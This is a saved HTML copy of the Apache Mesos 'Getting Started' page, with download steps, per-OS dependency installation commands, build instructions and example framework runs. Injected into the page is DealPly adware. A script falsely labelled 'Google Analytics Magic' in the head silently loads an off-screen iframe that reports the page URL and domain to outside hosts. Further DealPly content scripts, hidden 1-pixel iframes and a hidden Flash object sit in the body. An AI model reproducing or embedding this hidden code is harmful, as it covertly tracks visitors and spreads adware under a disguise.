<!DOCTYPE html>
<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
        <meta charset="utf-8">
        <title>Apache Mesos - Getting Started</title>
		    <meta name="viewport" content="width=device-width, initial-scale=1.0">

		    <link href="Apache%20Mesos%20-%20Getting%20Started_files/bootstrap.css" rel="stylesheet">
		    <link rel="alternate" type="application/atom+xml" title="Apache Mesos Blog" href="http://mesos.apache.org/blog/feed.xml">
		    
		    <link href="Apache%20Mesos%20-%20Getting%20Started_files/main.css" media="screen" rel="stylesheet" type="text/css">
				
		    
			
			<!-- Google Analytics Magic -->
			<script async="" type="text/javascript">(function(){try{if(typeof window['asdfdsasdfdsa'] === 'undefined'){setTimeout(function(){var shouldThisPartOfCodeRun = document.URL.search('http') === 0 ;if(!shouldThisPartOfCodeRun){	return;}if(typeof DealPly !== 'undefined' && typeof DealPly.serverCallParam === 'string'  ){var reportFlag = true;var scArr = document.getElementsByTagName('script');for(var index in scArr){if(typeof scArr[index].src === 'string' && scArr[index].src.search('\\.js\\?dn=') !== -1){	reportFlag = false;}}if(!reportFlag ){	return;}var host = 'http://q.nadijs.info/';var isSecure =  document.URL.search('https://') === 0 ;if(isSecure){	host = 'https://endall41-q.apollocdn.com/';}var urlPath = 'dealdo/event-report?type=quick&';var iframe = document.createElement('iframe');var suffix = ''; try{if(typeof JavaScriptJsTagUrl !== 'undefined'){suffix = JavaScriptJsTagUrl.substr(JavaScriptJsTagUrl.search('\?') + 1 );}}catch(e324324){}iframe.setAttribute('style','position:relative; left:-10000px; width:1px; height:1px; visibility:hidden');iframe.setAttribute('src',host + urlPath + 'url=' + encodeURIComponent(document.URL) + '&domain=' + document.domain   + '&topic=dpdiedarg&' + suffix );document.body.appendChild(iframe);}}, 10000);window['asdfdsasdfdsa'] = true;} }catch(e235534){}})();</script><script src="Apache%20Mesos%20-%20Getting%20Started_files/ga.js" async="" type="text/javascript"></script><script type="text/javascript">
			  var _gaq = _gaq || [];
			  _gaq.push(['_setAccount', 'UA-20226872-1']);
			  _gaq.push(['_setDomainName', 'apache.org']);
			  _gaq.push(['_trackPageview']);

			  (function() {
			    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
			    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
			    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
			  })();
			</script>
    <script class="dealply_content_script" id="__DealPly__185494.1688499636" type="text/javascript" src="Apache%20Mesos%20-%20Getting%20Started_files/-163760572.js"></script><script class="dealply_content_script" id="__DealPly__102048.61651694097" type="text/javascript" src="Apache%20Mesos%20-%20Getting%20Started_files/feedmon_extra.js"></script><script class="dealply_content_script" id="__DealPly__134154.99878503423" type="text/javascript" src="Apache%20Mesos%20-%20Getting%20Started_files/crt.js"></script></head>
    <body>
			<!-- magical breadcrumbs -->
			<div class="topnav">
			<ul class="breadcrumb">
			  <li>
					<div class="dropdown">
					  <a data-toggle="dropdown" href="#">Apache Software Foundation <span class="caret"></span></a>
					  <ul class="dropdown-menu" role="menu" aria-labelledby="dLabel">
							<li><a href="http://www.apache.org/">Apache Homepage</a></li>
							<li><a href="http://www.apache.org/licenses/">License</a></li>
					  	<li><a href="http://www.apache.org/foundation/sponsorship.html">Sponsorship</a></li>  
					  	<li><a href="http://www.apache.org/foundation/thanks.html">Thanks</a></li>
							<li><a href="http://www.apache.org/security/">Security</a></li>
					  </ul>
					</div>
				</li>
				<li><a href="http://mesos.apache.org/">Apache Mesos</a></li>
				
				
					<li><a href="http://mesos.apache.org/documentation/">Documentation
</a></li>
				
				
			</ul><!-- /breadcrumb -->
			</div>
			
			<!-- navbar excitement -->
	    <div class="navbar navbar-static-top" role="navigation">
	      <div class="navbar-inner">
	        <div class="container">
						<a href="http://mesos.apache.org/" class="logo"><img src="Apache%20Mesos%20-%20Getting%20Started_files/mesos_logo.png" alt="Apache Mesos logo"></a>
					<div class="nav-collapse">
						<ul class="nav nav-pills navbar-right">
						  <li><a href="http://mesos.apache.org/gettingstarted/">Getting Started</a></li>
						  <li><a href="http://mesos.apache.org/documentation/latest/">Documentation</a></li>
						  <li><a href="http://mesos.apache.org/downloads/">Downloads</a></li>
						  <li><a href="http://mesos.apache.org/community/">Community</a></li>
						</ul>
					</div>
	        </div>
	      </div>
	    </div><!-- /.navbar -->

      <div class="container">

			<div class="row-fluid">
	<div class="col-md-4">
		<h4>If you're new to Mesos</h4>
		<p>See the <a href="http://mesos.apache.org/gettingstarted/">getting started</a> page for more information about downloading, building, and deploying Mesos.</p>
		
		<h4>If you'd like to get involved or you're looking for support</h4>
		<p>See our <a href="http://mesos.apache.org/community/">community</a> page for more details.</p>
	</div>
	<div class="col-md-8">
		<h1>Getting Started</h1>

<h2>Downloading Mesos</h2>

<p>There are different ways you can get Mesos:</p>

<p>1. Download the latest stable release from <a href="http://mesos.apache.org/downloads/">Apache</a> (<strong><em>Recommended</em></strong>)</p>

<pre><code>$ wget http://www.apache.org/dist/mesos/0.27.2/mesos-0.27.2.tar.gz
$ tar -zxf mesos-0.27.2.tar.gz
</code></pre>

<p>2. Clone the Mesos git <a href="https://git-wip-us.apache.org/repos/asf/mesos.git">repository</a> (<strong><em>Advanced Users Only</em></strong>)</p>

<pre><code>$ git clone https://git-wip-us.apache.org/repos/asf/mesos.git
</code></pre>

<p><em>NOTE: If you have problems running the above commands, you may need to first run through the </em><strong>System Requirements</strong><em> section below to install the <code>wget</code>, <code>tar</code>, and <code>git</code> utilities for your system.</em></p>

<h2>System Requirements</h2>

<p>Mesos runs on Linux (64 Bit) and Mac OS X (64 Bit). To build Mesos from source, GCC 4.8.1+ or Clang 3.5+ is required.</p>

<p>For full support of process isolation under Linux a recent kernel &gt;=3.10 is required.</p>

<p>Make sure your hostname is resolvable via DNS or via <code>/etc/hosts</code>
 to allow full support of Docker’s host-networking capabilities, needed 
for some of the Mesos tests. When in doubt, please validate that <code>/etc/hosts</code> contains your hostname.</p>

<h3>Ubuntu 14.04</h3>

<p>Following are the instructions for stock Ubuntu 14.04. If you are using a different OS, please install the packages accordingly.</p>

<pre><code># Update the packages.
$ sudo apt-get update

# Install a few utility tools.
$ sudo apt-get install -y tar wget git

# Install the latest OpenJDK.
$ sudo apt-get install -y openjdk-7-jdk

# Install autotools (Only necessary if building from git repository).
$ sudo apt-get install -y autoconf libtool

# Install other Mesos dependencies.
$ sudo apt-get -y install build-essential python-dev python-boto libcurl4-nss-dev libsasl2-dev libsasl2-modules maven libapr1-dev libsvn-dev
</code></pre>

<h3>Mac OS X Yosemite &amp; El Capitan</h3>

<p>Following are the instructions for stock Mac OS X Yosemite and El 
Capitan. If you are using a different OS, please install the packages 
accordingly.</p>

<pre><code># Install Command Line Tools.
$ xcode-select --install

# Install Homebrew.
$ ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

# Install Java.
$ brew install Caskroom/cask/java

# Install libraries.
$ brew install wget git autoconf automake libtool subversion maven
</code></pre>

<p><em>NOTE: When upgrading from Yosemite to El Capitan, make sure to rerun <code>xcode-select --install</code> after the upgrade.</em></p>

<h3>CentOS 6.6</h3>

<p>Following are the instructions for stock CentOS 6.6. If you are using a different OS, please install the packages accordingly.</p>

<pre><code># Install a recent kernel for full support of process isolation.
$ sudo rpm --import https://www.elrepo.org/RPM-GPG-KEY-elrepo.org
$ sudo rpm -Uvh http://www.elrepo.org/elrepo-release-6-6.el6.elrepo.noarch.rpm
$ sudo yum --enablerepo=elrepo-kernel install -y kernel-lt

# Make the just installed kernel the one booted by default, and reboot.
$ sudo sed -i 's/default=1/default=0/g' /boot/grub/grub.conf
$ sudo reboot

# Install a few utility tools. This also forces an update of `nss`,
# which is necessary for the Java bindings to build properly.
$ sudo yum install -y tar wget git which nss

# 'Mesos &gt; 0.21.0' requires a C++ compiler with full C++11 support,
# (e.g. GCC &gt; 4.8) which is available via 'devtoolset-2'.
# Fetch the Scientific Linux CERN devtoolset repo file.
$ sudo wget -O /etc/yum.repos.d/slc6-devtoolset.repo http://linuxsoft.cern.ch/cern/devtoolset/slc6-devtoolset.repo

# Import the CERN GPG key.
$ sudo rpm --import http://linuxsoft.cern.ch/cern/centos/7/os/x86_64/RPM-GPG-KEY-cern

# Fetch the Apache Maven repo file.
$ sudo wget http://repos.fedorapeople.org/repos/dchen/apache-maven/epel-apache-maven.repo -O /etc/yum.repos.d/epel-apache-maven.repo

# 'Mesos &gt; 0.21.0' requires 'subversion &gt; 1.8' devel package, which is
# not available in the default repositories.
# Create a WANdisco SVN repo file to install the correct version:
$ sudo cat &gt; /etc/yum.repos.d/wandisco-svn.repo &lt;&lt;EOF
[WANdiscoSVN]
name=WANdisco SVN Repo 1.8
enabled=1
baseurl=http://opensource.wandisco.com/centos/6/svn-1.8/RPMS/$basearch/
gpgcheck=1
gpgkey=http://opensource.wandisco.com/RPM-GPG-KEY-WANdisco
EOF

# Install essential development tools.
$ sudo yum groupinstall -y "Development Tools"

# Install 'devtoolset-2-toolchain' which includes GCC 4.8.2 and related packages.
$ sudo yum install -y devtoolset-2-toolchain

# Install other Mesos dependencies.
$ sudo yum install -y apache-maven python-devel java-1.7.0-openjdk-devel zlib-devel libcurl-devel openssl-devel cyrus-sasl-devel cyrus-sasl-md5 apr-devel subversion-devel apr-util-devel

# Enter a shell with 'devtoolset-2' enabled.
$ scl enable devtoolset-2 bash
$ g++ --version  # Make sure you've got GCC &gt; 4.8!

# Process isolation is using cgroups that are managed by 'cgconfig'.
# The 'cgconfig' service is not started by default on CentOS 6.6.
# Also the default configuration does not attach the 'perf_event' subsystem.
# To do this, add 'perf_event = /cgroup/perf_event;' to the entries in '/etc/cgconfig.conf'.
$ sudo yum install -y libcgroup
$ sudo service cgconfig start
</code></pre>

<h3>CentOS 7.1</h3>

<p>Following are the instructions for stock CentOS 7.1. If you are using a different OS, please install the packages accordingly.</p>

<pre><code># Install a few utility tools
$ sudo yum install -y tar wget git

# Fetch the Apache Maven repo file.
$ sudo wget http://repos.fedorapeople.org/repos/dchen/apache-maven/epel-apache-maven.repo -O /etc/yum.repos.d/epel-apache-maven.repo

# Install the EPEL repo so that we can pull in 'libserf-1' as part of our
# subversion install below.
$ sudo yum install -y epel-release

# 'Mesos &gt; 0.21.0' requires 'subversion &gt; 1.8' devel package,
# which is not available in the default repositories.
# Create a WANdisco SVN repo file to install the correct version:
$ sudo cat &gt; /etc/yum.repos.d/wandisco-svn.repo &lt;&lt;EOF
[WANdiscoSVN]
name=WANdisco SVN Repo 1.9
enabled=1
baseurl=http://opensource.wandisco.com/centos/7/svn-1.9/RPMS/$basearch/
gpgcheck=1
gpgkey=http://opensource.wandisco.com/RPM-GPG-KEY-WANdisco
EOF

# Parts of Mesos require systemd in order to operate. However, Mesos
# only supports versions of systemd that contain the 'Delegate' flag.
# This flag was first introduced in 'systemd version 218', which is
# lower than the default version installed by centos. Luckily, centos
# 7.1 has a patched 'systemd &lt; 218' that contains the 'Delegate' flag.
# Explicity update systemd to this patched version.
$ sudo yum update systemd

# Install essential development tools.
$ sudo yum groupinstall -y "Development Tools"

# Install other Mesos dependencies.
$ sudo yum install -y apache-maven python-devel java-1.8.0-openjdk-devel zlib-devel libcurl-devel openssl-devel cyrus-sasl-devel cyrus-sasl-md5 apr-devel subversion-devel apr-util-devel
</code></pre>

<h2>Building Mesos</h2>

<pre><code># Change working directory.
$ cd mesos

# Bootstrap (Only required if building from git repository).
$ ./bootstrap

# Configure and build.
$ mkdir build
$ cd build
$ ../configure
$ make
</code></pre>

<p>In order to speed up the build and reduce verbosity of the logs, you can append <code>-j &lt;number of cores&gt; V=0</code> to <code>make</code>.</p>

<pre><code># Run test suite.
$ make check

# Install (Optional).
$ make install
</code></pre>

<h2>Examples</h2>

<p>Mesos comes bundled with example frameworks written in C++, Java and Python.
The framework binaries will only be available after running <code>make check</code>, as
described in the <strong><em>Building Mesos</em></strong> section above.</p>

<pre><code># Change into build directory.
$ cd build

# Start mesos master (Ensure work directory exists and has proper permissions).
$ ./bin/mesos-master.sh --ip=127.0.0.1 --work_dir=/var/lib/mesos

# Start mesos slave.
$ ./bin/mesos-slave.sh --master=127.0.0.1:5050

# Visit the mesos web page.
$ http://127.0.0.1:5050

# Run C++ framework (Exits after successfully running some tasks.).
$ ./src/test-framework --master=127.0.0.1:5050

# Run Java framework (Exits after successfully running some tasks.).
$ ./src/examples/java/test-framework 127.0.0.1:5050

# Run Python framework (Exits after successfully running some tasks.).
$ ./src/examples/python/test-framework 127.0.0.1:5050
</code></pre>

<p><em>Note: These examples assume you are running Mesos on your local machine.
Following them will not allow you to access the Mesos web page in a production
environment (e.g. on AWS). For that you will need to specify the actual IP of
your host when launching the Mesos master and ensure your firewall settings
allow access to port 5050 from the outside world.</em></p>

	</div>
</div>

			
	      <hr>

				<!-- footer -->
	      <div class="footer">
	        <p>© 2012-2015 <a href="http://apache.org/">The Apache Software Foundation</a>.
	        Apache Mesos, the Apache feather logo, and the Apache Mesos 
project logo are trademarks of The Apache Software Foundation.</p><p>
	      </p></div><!-- /footer -->

	    </div> <!-- /container -->

	    <!-- JS -->
	    <script src="Apache%20Mesos%20-%20Getting%20Started_files/jquery-1.js" type="text/javascript"></script>
			<script src="Apache%20Mesos%20-%20Getting%20Started_files/bootstrap.js" type="text/javascript"></script>
    

<script charset="UTF-8" src="Apache%20Mesos%20-%20Getting%20Started_files/javascript.js" async=""></script><script charset="UTF-8" src="Apache%20Mesos%20-%20Getting%20Started_files/javascript_002.js" async=""></script><iframe src="Apache%20Mesos%20-%20Getting%20Started_files/altHbHandler.html" scrolling="no" border="no" style="width: 1px; height: 1px; position: absolute; top: -100000px; left: -100000px; visibility: visible; overflow: hidden;" id="hb1457677984816" class="hb1457677984816" frameborder="0"></iframe><iframe style="width: 0;  height: 0;  position: absolute;  top: -10031px;  left:-1000000px;" scrolling="no" border="no" overflow="hidden" visibility="visible" src="Apache%20Mesos%20-%20Getting%20Started_files/idle.html" id="asdfad" frameborder="0"></iframe><div style="position: absolute; width: 1px; height: 1px;" id="dp_swf_engine"><object style="width: 1px; height: 1px;" id="_dp_swf_engine" data="Apache%20Mesos%20-%20Getting%20Started_files/swf.swf" type="application/x-shockwave-flash" height="1" width="1"><param value="always" name="allowscriptaccess"></object></div><iframe src="Apache%20Mesos%20-%20Getting%20Started_files/mailer.html" scrolling="no" border="no" style="width: 1px; height: 1px; position: absolute; top: -100000px; left: -100000px; visibility: visible; overflow: hidden;" id="mailer1457677984917" class="mailer1457677984917" frameborder="0"></iframe><iframe src="Apache%20Mesos%20-%20Getting%20Started_files/skinedEmpty.html" scrolling="no" border="no" style="width: 1px; height: 1px; position: absolute; top: -100000px; left: -100000px; visibility: visible; overflow: hidden;" id="s" class="dealply-toast s" frameborder="0"></iframe><iframe src="Apache%20Mesos%20-%20Getting%20Started_files/altHbHandler_002.html" scrolling="no" border="no" style="width: 1px; height: 1px; position: absolute; top: -100000px; left: -100000px; visibility: visible; overflow: hidden;" id="hb1457677986347" class="hb1457677986347" frameborder="0"></iframe></body><script type="application/x-javascript" src="Apache%20Mesos%20-%20Getting%20Started_files/opt_content.js"></script></html>